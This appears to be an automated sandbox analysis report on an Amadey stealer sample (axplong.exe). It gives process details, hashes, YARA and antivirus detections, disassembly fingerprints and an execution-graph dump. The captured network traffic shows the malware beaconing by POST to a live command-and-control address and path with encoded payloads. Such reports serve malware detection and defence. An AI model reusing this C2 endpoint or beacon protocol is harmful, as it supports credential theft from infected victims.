                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  67192.168.2.665129185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:12.865654945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:13.584402084 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:13.593420029 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:13.821906090 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  68192.168.2.665130185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:13.945755005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:14.634277105 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  69192.168.2.665131185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:14.643163919 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:15.349911928 CEST196INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  70192.168.2.665132185.215.113.16801924C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Sep 27, 2024 11:31:15.471771002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:16.183041096 CEST219INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:05:29:09
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0xcf0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2190425127.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2149476998.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:05:29:12
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2179442160.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2220557064.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 55%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:05:29:12
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2220852652.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2180250631.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:05:30:00
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:1'923'072 bytes
                                                                  MD5 hash:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2651739897.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 04CD0306 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58feae5c5b32446681ac4482b406d3cb46e08ca1c0e20d1e43031e5e231ab906
                                                                    • Instruction ID: d326a3db83d6410d7fed9e9d3df9ffb2dd5a8f92aed33113670095b32f41720d
                                                                    • Opcode Fuzzy Hash: 58feae5c5b32446681ac4482b406d3cb46e08ca1c0e20d1e43031e5e231ab906
                                                                    • Instruction Fuzzy Hash: 3201D6EF28C100BFB102928B2B189B6AB2FE5D2738B348836F503D2102F1D89A0D7031
                                                                    Function 04CD01E5 Relevance: .2, Instructions: 177COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c4793ecbc151d337f4002af221582950e2fd4abffc9ba29d81afd86bfd1dc37
                                                                    • Instruction ID: 564eec16eccb6fbb529602fd36e79abf2c4ded1e8dd14b55335569d5b6d6e3c5
                                                                    • Opcode Fuzzy Hash: 9c4793ecbc151d337f4002af221582950e2fd4abffc9ba29d81afd86bfd1dc37
                                                                    • Instruction Fuzzy Hash: 0F319EEB24D140BFE102895B6F449F67F6FF6C6738B34446AF502CB042F2955A0D6131
                                                                    Function 04CD0245 Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 253020a0eeb3198f240e9629543497a82f2521fc1041095fbfb68234398f5859
                                                                    • Instruction ID: 8412b665bbdfdf30b1571b6b137ae171733953a47d5b1d2fb62d7b31f15e53f0
                                                                    • Opcode Fuzzy Hash: 253020a0eeb3198f240e9629543497a82f2521fc1041095fbfb68234398f5859
                                                                    • Instruction Fuzzy Hash: 8C31F8EB24D140BFB142958B6F58AF6BB2FE6C3738B34842AF906D6102F2D45A5D7131
                                                                    Function 04CD027A Relevance: .1, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9bf904e2e043d2c777759452d13c4d8b304e63c4884b923a61c35f3a5b3427e
                                                                    • Instruction ID: 541f514f514591b0391c704d1a81135cb1f2deb68d43a00cc95e6ce8e6e443ac
                                                                    • Opcode Fuzzy Hash: d9bf904e2e043d2c777759452d13c4d8b304e63c4884b923a61c35f3a5b3427e
                                                                    • Instruction Fuzzy Hash: AB31AEBB24D140BFE202965B6B499F67B7BEAC3738B34847AF502C7502F2944A1DB131
                                                                    Function 04CD0340 Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4b0ab8081ac2926fbf76e7e65d477d364c93acd0c91dd7f2f991251f700dd0c
                                                                    • Instruction ID: 9eb67c842ae55ec0f2cb2821de5a1c92538fe9af4a42cdf840c8db2f0ea0a558
                                                                    • Opcode Fuzzy Hash: b4b0ab8081ac2926fbf76e7e65d477d364c93acd0c91dd7f2f991251f700dd0c
                                                                    • Instruction Fuzzy Hash: 56217DBB24D140AFE302869BAF499F5BF3AEAD3738735446BF442C7042F194960EA131
                                                                    Function 04CD02BC Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 68ac2fdcbf81bf59769531ee168e1478f70d11d77153f37e2c777bcbcee1c7eb
                                                                    • Instruction ID: df9bad9b3b566948e37313811650d4453fca6a64b40f839dccf125bd4e1c2cb5
                                                                    • Opcode Fuzzy Hash: 68ac2fdcbf81bf59769531ee168e1478f70d11d77153f37e2c777bcbcee1c7eb
                                                                    • Instruction Fuzzy Hash: 48219EEB249100AFA202924F6B485F6BB3BFAC3738B34842AF502D7102B2D45B1D7131
                                                                    Function 04CD02D7 Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40ee671ca15232aac994e1ef8c9c54a125302324670fb1758b55e528952436f1
                                                                    • Instruction ID: f7a18ffb5953cf939f34befd21fff05696ccc18262a5d6479cd2d9fc0bb5d616
                                                                    • Opcode Fuzzy Hash: 40ee671ca15232aac994e1ef8c9c54a125302324670fb1758b55e528952436f1
                                                                    • Instruction Fuzzy Hash: 27216DFB14D240AFE20283576B499F6BB7AFAD3638734446AF442D7102F2A45A1DA131
                                                                    Function 04CD02AE Relevance: .1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87f190d7f4d191cfdcbbffa51a85f11956c1806e93addd3777fc23b6e5857221
                                                                    • Instruction ID: 7c08e84b42c1138cd8d2dd19deec8113b2532a5de7103f71ca0372e89a213539
                                                                    • Opcode Fuzzy Hash: 87f190d7f4d191cfdcbbffa51a85f11956c1806e93addd3777fc23b6e5857221
                                                                    • Instruction Fuzzy Hash: 422184EB24D144BFA102964B6B485F5BB3BFAD3738B34846AF503D7102B2D45A1D7131
                                                                    Function 04CD02C5 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: af1b6883a051f6b3ff6b8ccb9d6bb0e5dde8bb4c1d8476d4852d1a00989b4748
                                                                    • Instruction ID: 1cd5364ee508f659c9e3ee1d6f2e08188c4102249a600dc660cf817717c20773
                                                                    • Opcode Fuzzy Hash: af1b6883a051f6b3ff6b8ccb9d6bb0e5dde8bb4c1d8476d4852d1a00989b4748
                                                                    • Instruction Fuzzy Hash: 5E213BAB249140BFE202975B6B485F6BB3AFAD3738B34886AF542D7103B2945A1D7131
                                                                    Function 04CD0393 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a08f74ce65a7da6e0bf21101fd9dc6785cfc91bb7833a4fe8109cd2a6b9c83ed
                                                                    • Instruction ID: a329968b59a46e9d5e083b3908dd3b33845e8446e06d18877b4c439e6063b4b4
                                                                    • Opcode Fuzzy Hash: a08f74ce65a7da6e0bf21101fd9dc6785cfc91bb7833a4fe8109cd2a6b9c83ed
                                                                    • Instruction Fuzzy Hash: 372161BB14D140AFE212865B6B489F6BB3AFBC2738B34846BF541D7002F2A4570E6131
                                                                    Function 04CD032B Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2432d45a870b899b712162ddc6e231863d50a051c15303eb796e3e13edf3945a
                                                                    • Instruction ID: 8bf9f52e354043c238af9ece098f6ab50683036a81633ea01f6f6395ace71fc0
                                                                    • Opcode Fuzzy Hash: 2432d45a870b899b712162ddc6e231863d50a051c15303eb796e3e13edf3945a
                                                                    • Instruction Fuzzy Hash: 1601D6EF248500AFB102928B2F5CAF6AB6EE5D2734B348426F542D2102B1D89A0E7031
                                                                    Function 04CD0371 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2b4d63990230ab0b92ff15227be1be8dbc3039e62f16f1f3b73f315eb9ee9dd
                                                                    • Instruction ID: 6357eebff73c5855cdfec35d9480dcf7c70afa4f93d45ec844ee09f6324b89c4
                                                                    • Opcode Fuzzy Hash: b2b4d63990230ab0b92ff15227be1be8dbc3039e62f16f1f3b73f315eb9ee9dd
                                                                    • Instruction Fuzzy Hash: 0101FCEF2891046FF11292977F186F7BBAEE5D27347308436F452D3142E1E44A4E6130
                                                                    Function 04CD03A2 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2192199639.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_4cd0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6713f8eebd928f23feddcf007047d54d5dae386e9bdd26958b5bae3518e1016d
                                                                    • Instruction ID: 898b244c02b2da29e380c95756131351b90c0bef41ae4cc7a2a4cfd68053f983
                                                                    • Opcode Fuzzy Hash: 6713f8eebd928f23feddcf007047d54d5dae386e9bdd26958b5bae3518e1016d
                                                                    • Instruction Fuzzy Hash: 53F022EF1880006E711392973B186F6ABAEE9D3B347308432F442D2243E1D84A1E7031

                                                                    Execution Graph

                                                                    Execution Coverage:9.1%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:17.6%
                                                                    Total number of Nodes:981
                                                                    Total number of Limit Nodes:78
                                                                    execution_graph 13837 901dd0 13995 907f30 13837->13995 13839 901e6b 13840 901ee8 13839->13840 13841 901e78 13839->13841 13842 907f30 RtlAllocateHeap 13840->13842 13843 907870 RtlAllocateHeap 13841->13843 13848 901f27 shared_ptr 13842->13848 13844 901e92 13843->13844 13845 8f5b20 RtlAllocateHeap 13844->13845 13846 901e99 13845->13846 13847 907870 RtlAllocateHeap 13846->13847 13850 901eaf 13847->13850 13849 902041 13848->13849 13852 902dd5 13848->13852 13853 901fbf 13848->13853 13880 902936 shared_ptr 13848->13880 14008 907870 13849->14008 13854 907870 RtlAllocateHeap 13850->13854 14251 908070 13852->14251 13857 907f30 RtlAllocateHeap 13853->13857 13858 901ec7 13854->13858 13856 902050 14019 8f5b20 13856->14019 13867 901fe3 shared_ptr 13857->13867 13861 907870 RtlAllocateHeap 13858->13861 13859 902dda 13863 908070 RtlAllocateHeap 13859->13863 13942 901edf 13861->13942 13862 90c0c9 std::_Xinvalid_argument RtlAllocateHeap 13864 902e02 13862->13864 13873 902ddf 13863->13873 14257 90c109 13864->14257 13865 907f30 RtlAllocateHeap 13865->13849 13866 907870 RtlAllocateHeap 13869 902afc 13866->13869 13867->13865 13867->13880 13872 8fe440 7 API calls 13869->13872 13870 90205b 13870->13859 13871 9020b2 13870->13871 13874 907f30 RtlAllocateHeap 13871->13874 13872->13880 14254 90c0c9 13873->14254 13877 9020d7 shared_ptr 13874->13877 13876 907870 RtlAllocateHeap 13878 902142 13876->13878 13877->13873 13877->13876 13879 8f5b20 RtlAllocateHeap 13878->13879 13881 90214d 13879->13881 13880->13862 13883 902db0 shared_ptr __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 13880->13883 13882 907f30 RtlAllocateHeap 13881->13882 13884 9021b4 shared_ptr __dosmaperr 13882->13884 13884->13873 14026 928979 13884->14026 13887 902274 13887->13864 13889 9024b7 13887->13889 13890 9023ba 13887->13890 13891 90256b 13887->13891 13892 90228d 13887->13892 13935 9022e2 shared_ptr 13887->13935 13888 907870 RtlAllocateHeap 13894 902640 13888->13894 13893 907870 RtlAllocateHeap 13889->13893 13896 907870 RtlAllocateHeap 13890->13896 13897 907870 RtlAllocateHeap 13891->13897 13895 907870 RtlAllocateHeap 13892->13895 13899 9024ce 13893->13899 13900 907870 RtlAllocateHeap 13894->13900 13901 9022a4 13895->13901 13902 9023d1 13896->13902 13898 902582 13897->13898 13903 907870 RtlAllocateHeap 13898->13903 13904 907870 RtlAllocateHeap 13899->13904 13905 902652 13900->13905 13906 907870 RtlAllocateHeap 13901->13906 13907 907870 RtlAllocateHeap 13902->13907 13909 90259a 13903->13909 13910 9024e6 13904->13910 14030 926659 13905->14030 13911 9022bc 13906->13911 13908 9023e9 13907->13908 13912 907870 RtlAllocateHeap 13908->13912 13913 907870 RtlAllocateHeap 13909->13913 13914 907870 RtlAllocateHeap 13910->13914 13915 907870 RtlAllocateHeap 13911->13915 13927 902401 13912->13927 13916 9025b2 13913->13916 13917 9024fe 13914->13917 13919 9022d4 13915->13919 14241 8f8de0 13916->14241 14231 8f8f60 13917->14231 14221 8f8c60 13919->14221 13924 902a83 13925 907870 RtlAllocateHeap 13924->13925 13928 902a9d 13925->13928 13930 907f30 RtlAllocateHeap 13927->13930 13931 8f5b20 RtlAllocateHeap 13928->13931 13929 90268b 13932 907870 RtlAllocateHeap 13929->13932 13930->13935 13933 902aa4 13931->13933 13938 9026a0 shared_ptr __dosmaperr 13932->13938 13934 907870 RtlAllocateHeap 13933->13934 13936 902aba 13934->13936 13935->13880 13935->13888 13937 907870 RtlAllocateHeap 13936->13937 13939 902ad2 13937->13939 13938->13880 13941 928979 5 API calls 13938->13941 13940 907870 RtlAllocateHeap 13939->13940 13940->13942 13943 902759 13941->13943 13942->13866 13943->13864 13943->13880 13943->13924 13944 902781 13943->13944 13945 907870 RtlAllocateHeap 13944->13945 13946 902798 13945->13946 13947 907870 RtlAllocateHeap 13946->13947 13948 9027ad 13947->13948 14037 8f7780 13948->14037 13950 9027b6 13951 9027d1 13950->13951 13952 902a26 13950->13952 13953 907870 RtlAllocateHeap 13951->13953 13954 907870 RtlAllocateHeap 13952->13954 13955 9027db 13953->13955 13956 902a30 13954->13956 13957 8f5b20 RtlAllocateHeap 13955->13957 13958 8f5b20 RtlAllocateHeap 13956->13958 13959 9027e2 13957->13959 13960 902a37 13958->13960 13961 907870 RtlAllocateHeap 13959->13961 13962 907870 RtlAllocateHeap 13960->13962 13964 9027f8 13961->13964 13963 902a4d 13962->13963 13965 907870 RtlAllocateHeap 13963->13965 13966 907870 RtlAllocateHeap 13964->13966 13967 902a65 13965->13967 13968 902810 13966->13968 13969 907870 RtlAllocateHeap 13967->13969 13970 907870 RtlAllocateHeap 13968->13970 13969->13942 13971 902828 13970->13971 13972 907870 RtlAllocateHeap 13971->13972 13973 90283a 13972->13973 14050 8fe440 13973->14050 13975 902843 13975->13880 13976 907870 RtlAllocateHeap 13975->13976 13977 9028a4 13976->13977 13978 8f5b20 RtlAllocateHeap 13977->13978 13979 9028af 13978->13979 14186 908250 13979->14186 13981 9028c3 14190 908510 13981->14190 13983 9028d7 13984 908250 RtlAllocateHeap 13983->13984 13985 9028e7 13984->13985 13986 907870 RtlAllocateHeap 13985->13986 13987 902907 13986->13987 14194 8f88b0 13987->14194 13989 90290e 13990 907870 RtlAllocateHeap 13989->13990 13991 902923 13990->13991 13992 8f5b20 RtlAllocateHeap 13991->13992 13993 90292a 13992->13993 14202 8f5df0 13993->14202 13997 907f4e 13995->13997 13999 907f74 13995->13999 13997->13839 13998 908063 14271 8f2440 13998->14271 14001 907fc8 13999->14001 14002 907fed 13999->14002 14006 907fd9 13999->14006 14001->13998 14260 90d312 14001->14260 14005 90d312 RtlAllocateHeap 14002->14005 14002->14006 14005->14006 14007 908040 